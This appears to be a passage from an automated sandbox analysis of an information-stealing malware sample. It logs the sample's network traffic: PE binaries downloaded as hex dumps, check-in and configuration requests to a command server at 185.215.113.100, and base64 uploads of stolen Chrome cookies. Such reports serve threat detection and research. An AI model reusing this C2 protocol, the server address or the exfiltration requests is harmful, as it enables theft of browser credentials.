41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:10 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:12 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 37 43 44 31 34 35 35 38 39 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="hwid"F7CD145589561166170430------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="build"leva------GHDHJEBFBFHJECAKFCAA--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECAFHDBGHJKFIDHJJJEHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 41 46 48 44 42 47 48 4a 4b 46 49 44 48 4a 4a 4a 45 2d 2d 0d 0a Data Ascii: ------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------IECAFHDBGHJKFIDHJJJEContent-Disposition: form-data; name="message"browsers------IECAFHDBGHJKFIDHJJJE--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="message"plugins------FCAAEHJDBKJJKFHJEBKF--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJECAFIDAFHJKFCGHIHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 43 41 46 49 44 41 46 48 4a 4b 46 43 47 48 49 2d 2d 0d 0a Data Ascii: ------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------DGHJECAFIDAFHJKFCGHIContent-Disposition: form-data; name="message"fplugins------DGHJECAFIDAFHJKFCGHI--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJECBGIJDGCAEBFIIECAHost: 185.215.113.100Content-Length: 6535Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEGHost: 185.215.113.100Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEHJDBKJJKFHJEBKFHost: 185.215.113.100Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 37 33 30 61 66 66 37 65 32 65 38 30 32 35 37 38 66 30 31 35 63 61 39 66 34 65 66 30 38 33 64 64 64 61 64 62 33 62 62 61 66 65 37 65 38 39 64 35 64 38 36 66 61 64 31 30 65 35 35 66 37 63 38 63 33 33 34 65 66 38 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 48 4a 44 42 4b 4a 4a 4b 46 48 4a 45 42 4b 46 2d 2d 0d 0a Data Ascii: ------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="token"2730aff7e2e802578f015ca9f4ef083dddadb3bbafe7e89d5d86fad10e55f7c8c334ef86------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------FCAAEHJDBKJJKFHJEBKFContent-Disposition: form-data; name="file"------FCAAEHJDBKJJKFHJEBKF--
